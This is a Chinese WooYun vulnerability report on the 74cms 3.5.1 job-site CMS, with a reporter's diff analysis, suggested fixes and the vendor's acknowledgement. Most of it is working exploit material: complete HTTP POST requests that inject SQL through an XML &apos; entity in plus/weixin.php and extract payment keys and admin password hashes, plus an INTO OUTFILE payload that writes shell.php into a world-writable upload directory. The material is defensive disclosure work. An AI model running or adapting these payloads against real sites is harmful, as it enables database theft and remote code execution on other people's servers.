当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-081223

漏洞标题:骑士CMS(20141027)多个漏洞组合可致所有数据泄露+getshell

相关厂商:74c,s.com

漏洞作者: 龟兔赛跑

提交时间:2014-10-30 18:47

修复时间:2015-01-28 18:48

公开时间:2015-01-28 18:48

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-10-30: 细节已通知厂商并且等待厂商处理中
2014-11-03: 厂商已经确认,细节仅向厂商公开
2014-11-06: 细节向第三方安全合作伙伴开放
2014-12-28: 细节向核心白帽子及相关领域专家公开
2015-01-07: 细节向普通白帽子公开
2015-01-17: 细节向实习白帽子公开
2015-01-28: 细节向公众公开

简要描述:

专注挖魂。。。
74cms_v3.5.1_20141027.zip 无限制SQL注入

详细说明:

刚下了个74cms_v3.5.1_20141027.zip,diff了一下发现了下面的改动:

diff -Nurp upload.1020/plus/weixin.php upload.1027/plus/weixin.php
--- upload.1020/plus/weixin.php	2014-10-18 12:14:22.000000000 +0800
+++ upload.1027/plus/weixin.php	2014-10-25 14:45:22.000000000 +0800
@@ -21,10 +21,10 @@ class wechatCallbackapiTest extends mysq
     }
     public function responseMsg()
     {
-		if(!$this->checkSignature())
-		{
-        	exit();
-        }
+		// if(!$this->checkSignature())
+		// {
+  //       	exit();
+  //       }
 		$postStr = addslashes($GLOBALS["HTTP_RAW_POST_DATA"]);
 		if (!empty($postStr))
 		{


注释调了checkSignature(),是为了啥?????
WooYun: 74CMS最新版绕过继续任意文件读取(通用性分析)到任意文件删除 曾经分析过这里的XXE漏洞以及SQLI,不过,被次利用的是另外两个BUG。
先看code.

class wechatCallbackapiTest extends mysql
{
	public function valid()
    {
        $echoStr = $_GET["echostr"];
        if($this->checkSignature())
		{
        	exit($echoStr);
        }
    }
    public function responseMsg()
    {
		// if(!$this->checkSignature())
		// {
  //       	exit();
  //       }
		$postStr = addslashes($GLOBALS["HTTP_RAW_POST_DATA"]);
		if (!empty($postStr))
		{
			// libxml_disable_entity_loader(true);
            $postObj = simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA);
            $fromUsername = $postObj->FromUserName;
            $toUsername = $postObj->ToUserName;
            $keyword = trim($postObj->Content);
			$keyword = utf8_to_gbk($keyword);
			$keyword = addslashes($keyword);
            $time = time();
			$event = trim($postObj->Event);
			
			if ($event === "subscribe")
			{
				$word= "»ØžŽj·µ»ØœôŒ±ÕÐÆž£¬»ØžŽn·µ»Ø×îÐÂÕÐÆž£¡Äú¿ÉÒÔ³¢ÊÔÊäÈëְλÃû³ÆÈç¡°»áŒÆ¡±£¬ÏµÍ³œ«»á·µ»ØÄúÒªÕÒµÄÐÅÏ¢£¬ÎÒÃÇŬÁŠŽòÔì×îÈËÐÔ»¯µÄ·þÎñƜ̚£¬Ð»Ð»¹Ø×¢¡£";
				$this->exit_word_message($word,$fromUsername,$toUsername,$time);			
			}	
			$default_pic=ROOT."/data/images/".DEFAULT_PIC;
			$first_pic=ROOT."/data/images/".FIRST_PIC;
			if($event === "CLICK"){
				if($_CFG['weixin_apiopen']=='0')
				{
					$word="Íø՟΢ÐŜӿÚÒÑŸ­¹Ø±Õ";
					$this->exit_word_message($word,$fromUsername,$toUsername,$time);
				}
				if($postObj->EventKey=="binding"){
					$usinfo = $this->get_user_info($fromUsername);
					if(!empty($usinfo)){
						$word="ÄúÒÑŸ­°ó¶š¹ýÁË!";
					}else{
						$word="ÇëÊäÈëÄúµÄÕ˺ÅÃÜÂë.
ÀýÈç:ÕÅÈý/123456";
					}
					$this->exit_word_message($word,$fromUsername,$toUsername,$time);
				}
...
	private function get_user_info($fromUsername){
		$usinfo = array();
		$usinfo_obj = $this->query("select * from ".table('members')." where weixin_openid='".$fromUsername."' limit 1");
		while($row = $this->fetch_array($usinfo_obj)){
			$usinfo = $row;
		}
		return $usinfo;
	}


$postStr = addslashes($GLOBALS["HTTP_RAW_POST_DATA"]);


对整个POST_DATA做了addslashes。

$postObj = simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA);
            $fromUsername = $postObj->FromUserName;


然后:

$usinfo = $this->get_user_info($fromUsername);
===>
$this->query("select * from ".table('members')." where weixin_openid='".$fromUsername."' limit 1");


$fromUsername从simplexml_load_string()后就直接进入了SQL中,addslashes($GLOBALS["HTTP_RAW_POST_DATA"])就解决了所有问题么?答案是否定的。因为XML中特殊字符也可以编码:

特殊字符 特殊含义 实体编码
> 开始标记 >
< 结束标记 &lt;
" 引号 &quot;
' 撇号 &apos;
& 和号 &amp;


也就是说在XML中使用&apos就把'号注入进去了,并且这里post data没有任何过滤,可以注入任何SQL语句,所以我们可以导出整个数据库,甚至getshell.
看到下面的代码,也许有人会说,这里是有条件的,因为这里判断了$_CFG['weixin_apiopen']=='0')。

if($event === "CLICK"){
				if($_CFG['weixin_apiopen']=='0')
				{
					$word="Íø՟΢ÐŜӿÚÒÑŸ­¹Ø±Õ";
					$this->exit_word_message($word,$fromUsername,$toUsername,$time);
				}


不过,这里的$_CFG['weixin_apiopen']真的有效么?下面的代码可以告诉我们:

<?php
$_CFG = 0;
class Test {
    function myprint() {
        echo "$_CFG in class=" . $_CFG;
    }
}
echo "in file =" . $_CFG;
$tt = new Test();
$tt->myprint();
?>


在浏览器访问一下http://127.0.0.1:8081/74cms/test.php,结果为:

in file =0
Notice: Undefined variable: _CFG in /var/www/html/74cms/test.php on line 7
Notice: Undefined variable: _CFG in /var/www/html/74cms/test.php on line 7
in class=


也就是在class object里面访问$_CFG是无效的。
那么,那么,

$_CFG['weixin_apiopen']=='0'


这个条件就是永远都不会成立的,不管你后台开不开weixin_api。
好了,所有条件限制都排除了,可以直接注入了。
一下为74cms_v3.5.1_20141027默认安装测试:

POST /74cms/plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709 HTTP/1.1
Content-Type: application/xml 
User-Agent: http4e/5.0.12
Host: 127.0.0.1:8081
Content-Length: 155
<xml>
<ToUserName>111</ToUserName>
<FromUserName>1111&apos;</FromUserName>
<Content>2222</Content>
<Event>CLICK</Event>
<EventKey>binding</EventKey>
</xml>


HTTP/1.1 200 OK
Date: Wed, 29 Oct 2014 07:33:13 GMT
Server: Apache/2.4.10 (Fedora) PHP/5.5.18 mod_wsgi/3.5 Python/2.7.5 mod_perl/2.0.9-dev Perl/v5.18.4
X-Powered-By: PHP/5.5.18
Set-Cookie: PHPSESSID=2ctd2pnvhip2mpvbs57rlvmq91; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 79
Content-Type: text/html;charset=gb2312
Error��Query error:select * from qs_members where weixin_openid='1111'' limit 1


UNION SELECT:

POST /74cms/plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709 HTTP/1.1
Content-Type: application/xml 
User-Agent: http4e/5.0.12
Host: 127.0.0.1:8081
Content-Length: 226
<xml>
<ToUserName>111</ToUserName>
<FromUserName>1111&apos; union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#</FromUserName>
<Content>2222</Content>
<Event>CLICK</Event>
<EventKey>binding</EventKey>
</xml>


HTTP/1.1 200 OK
Date: Wed, 29 Oct 2014 07:36:59 GMT
Server: Apache/2.4.10 (Fedora) PHP/5.5.18 mod_wsgi/3.5 Python/2.7.5 mod_perl/2.0.9-dev Perl/v5.18.4
X-Powered-By: PHP/5.5.18
Set-Cookie: PHPSESSID=3nh4puf9it16ea6omld6h26412; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 316
Content-Type: text/html;charset=gb2312
<xml>
		<ToUserName><![CDATA[1111' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#]]></ToUserName>
		<FromUserName><![CDATA[111]]></FromUserName>
		<CreateTime>1414568219</CreateTime>
		<MsgType><![CDATA[text]]></MsgType>
		<Content><![CDATA[您已经绑定过了!]]></Content>
		</xml>


获取支付相关的key:

POST /74cms/plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709 HTTP/1.1
Content-Type: application/xml 
User-Agent: http4e/5.0.12
Host: 127.0.0.1:8081
Content-Length: 303
<xml>
<ToUserName>111</ToUserName>
<FromUserName>1111&apos; union select (select group_concat(id,0x7c,typename,0x7c,ytauthkey,0x5d) from qs_payment),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#</FromUserName>
<Content>2222</Content>
<Event>CLICK</Event>
<EventKey>apply_jobs</EventKey>
</xml>


HTTP/1.1 200 OK
Date: Wed, 29 Oct 2014 07:49:52 GMT
Server: Apache/2.4.10 (Fedora) PHP/5.5.18 mod_wsgi/3.5 Python/2.7.5 mod_perl/2.0.9-dev Perl/v5.18.4
X-Powered-By: PHP/5.5.18
Set-Cookie: PHPSESSID=u4o47rf3pk29shkk433cfompj0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 137
Content-Type: text/html;charset=gb2312
Error��Query error:select * from qs_personal_jobs_apply where personal_uid=1|remittance|],2|chinabank|],3|tenpay|xndcgc],4|alipay|kiohad]


错误信息里面的

1|remittance|],2|chinabank|],3|tenpay|xndcgc],4|alipay|kiohad]


就是表里面的数据。
管理员表:

POST /74cms/plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709 HTTP/1.1
Content-Type: application/xml 
User-Agent: http4e/5.0.12
Host: 127.0.0.1:8081
Content-Length: 303
<xml>
<ToUserName>111</ToUserName>
<FromUserName>1111&apos; union select (select group_concat(admin_name,0x7c,pwd,0x7c,pwd_hash,0x5d) from qs_admin),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#</FromUserName>
<Content>2222</Content>
<Event>CLICK</Event>
<EventKey>apply_jobs</EventKey>
</xml>


HTTP/1.1 200 OK
Date: Wed, 29 Oct 2014 08:09:07 GMT
Server: Apache/2.4.10 (Fedora) PHP/5.5.18 mod_wsgi/3.5 Python/2.7.5 mod_perl/2.0.9-dev Perl/v5.18.4
X-Powered-By: PHP/5.5.18
Set-Cookie: PHPSESSID=dgh5nio4aflji6ppjatq9iee14; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 121
Content-Type: text/html;charset=gb2312
Error��Query error:select * from qs_personal_jobs_apply where personal_uid=admin|81cdc144e960168e163223605e5daeba|taZeD1]


getshell:

POST /74cms/plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709 HTTP/1.1
Content-Type: application/xml 
User-Agent: http4e/5.0.12
Host: 127.0.0.1:8081
Content-Length: 324
<xml>
<ToUserName>111</ToUserName>
<FromUserName>1111&apos; union select 0x3C3F70687020706870696E666F28293B3F3E,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 INTO OUTFILE &apos;/var/www/html/74cms/data/shell.php&apos; #</FromUserName>
<Content>2222</Content>
<Event>CLICK</Event>
<EventKey>binding</EventKey>
</xml>


返回错误:

HTTP/1.1 200 OK
Date: Wed, 29 Oct 2014 08:29:11 GMT
Server: Apache/2.4.10 (Fedora) PHP/5.5.18 mod_wsgi/3.5 Python/2.7.5 mod_perl/2.0.9-dev Perl/v5.18.4
X-Powered-By: PHP/5.5.18
Set-Cookie: PHPSESSID=tkimiq88f2v707inhs5avrvbd5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 238
Content-Type: text/html;charset=gb2312
Error��Query error:select * from qs_members where weixin_openid='1111' union select 0x3C3F70687020706870696E666F28293B3F3E,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 INTO OUTFILE '/var/www/html/74cms/data/shell.php' #' limit 1


这是因为写shell.php需要有写权限,data目录不行。
但是,但是,我们也可以找一个肯定有写权限的目录:
注册一个普通用户,长传一个头像,这是会建立0777权限的目录:'data/avatar/100/2014',shell就传到这个目录吧。

POST /74cms/plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709 HTTP/1.1
Content-Type: application/xml 
User-Agent: http4e/5.0.12
Host: 127.0.0.1:8081
Content-Length: 340
<xml>
<ToUserName>111</ToUserName>
<FromUserName>1111&apos; union select 0x3C3F70687020706870696E666F28293B3F3E,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 INTO OUTFILE &apos;/var/www/html/74cms/data/avatar/100/2014/shell.php&apos; #</FromUserName>
<Content>2222</Content>
<Event>CLICK</Event>
<EventKey>binding</EventKey>
</xml>


HTTP/1.1 200 OK
Date: Wed, 29 Oct 2014 08:25:09 GMT
Server: Apache/2.4.10 (Fedora) PHP/5.5.18 mod_wsgi/3.5 Python/2.7.5 mod_perl/2.0.9-dev Perl/v5.18.4
X-Powered-By: PHP/5.5.18
Set-Cookie: PHPSESSID=8m121t281t85udkja8rt8ub147; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 448
Content-Type: text/html;charset=gb2312
<xml>
		<ToUserName><![CDATA[1111' union select 0x3C3F70687020706870696E666F28293B3F3E,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 INTO OUTFILE '/var/www/html/74cms/data/avatar/100/2014/shell.php' #]]></ToUserName>
		<FromUserName><![CDATA[111]]></FromUserName>
		<CreateTime>1414571109</CreateTime>
		<MsgType><![CDATA[text]]></MsgType>
		<Content><![CDATA[请输入您的账号密码.
例如:张三/123456]]></Content>
		</xml>


浏览器访问:
http://127.0.0.1:8081/74cms/data/avatar/100/2014/shell.php

1.png

漏洞证明:

获取支付相关的key:

POST /74cms/plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709 HTTP/1.1
Content-Type: application/xml 
User-Agent: http4e/5.0.12
Host: 127.0.0.1:8081
Content-Length: 303
<xml>
<ToUserName>111</ToUserName>
<FromUserName>1111&apos; union select (select group_concat(id,0x7c,typename,0x7c,ytauthkey,0x5d) from qs_payment),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#</FromUserName>
<Content>2222</Content>
<Event>CLICK</Event>
<EventKey>apply_jobs</EventKey>
</xml>


HTTP/1.1 200 OK
Date: Wed, 29 Oct 2014 07:49:52 GMT
Server: Apache/2.4.10 (Fedora) PHP/5.5.18 mod_wsgi/3.5 Python/2.7.5 mod_perl/2.0.9-dev Perl/v5.18.4
X-Powered-By: PHP/5.5.18
Set-Cookie: PHPSESSID=u4o47rf3pk29shkk433cfompj0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 137
Content-Type: text/html;charset=gb2312
Error��Query error:select * from qs_personal_jobs_apply where personal_uid=1|remittance|],2|chinabank|],3|tenpay|xndcgc],4|alipay|kiohad]


管理员表:

POST /74cms/plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709 HTTP/1.1
Content-Type: application/xml 
User-Agent: http4e/5.0.12
Host: 127.0.0.1:8081
Content-Length: 303
<xml>
<ToUserName>111</ToUserName>
<FromUserName>1111&apos; union select (select group_concat(admin_name,0x7c,pwd,0x7c,pwd_hash,0x5d) from qs_admin),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#</FromUserName>
<Content>2222</Content>
<Event>CLICK</Event>
<EventKey>apply_jobs</EventKey>
</xml>


HTTP/1.1 200 OK
Date: Wed, 29 Oct 2014 08:09:07 GMT
Server: Apache/2.4.10 (Fedora) PHP/5.5.18 mod_wsgi/3.5 Python/2.7.5 mod_perl/2.0.9-dev Perl/v5.18.4
X-Powered-By: PHP/5.5.18
Set-Cookie: PHPSESSID=dgh5nio4aflji6ppjatq9iee14; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 121
Content-Type: text/html;charset=gb2312
Error��Query error:select * from qs_personal_jobs_apply where personal_uid=admin|81cdc144e960168e163223605e5daeba|taZeD1]


getshell:

1.png

修复方案:

1. checkSignature()不需要了?
2. if($_CFG['weixin_apiopen']=='0') always不成立,文件最前面用:
define("APIOPEN", $_CFG['weixin_apiopen']);吧。
3. $postObj的每个元素使用前先addslashes()
4. 上传图片文件的目录不需要用0777的权限吧。

版权声明:转载请注明来源 龟兔赛跑@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-11-03 15:25

厂商回复:

感谢反馈!

最新状态:

暂无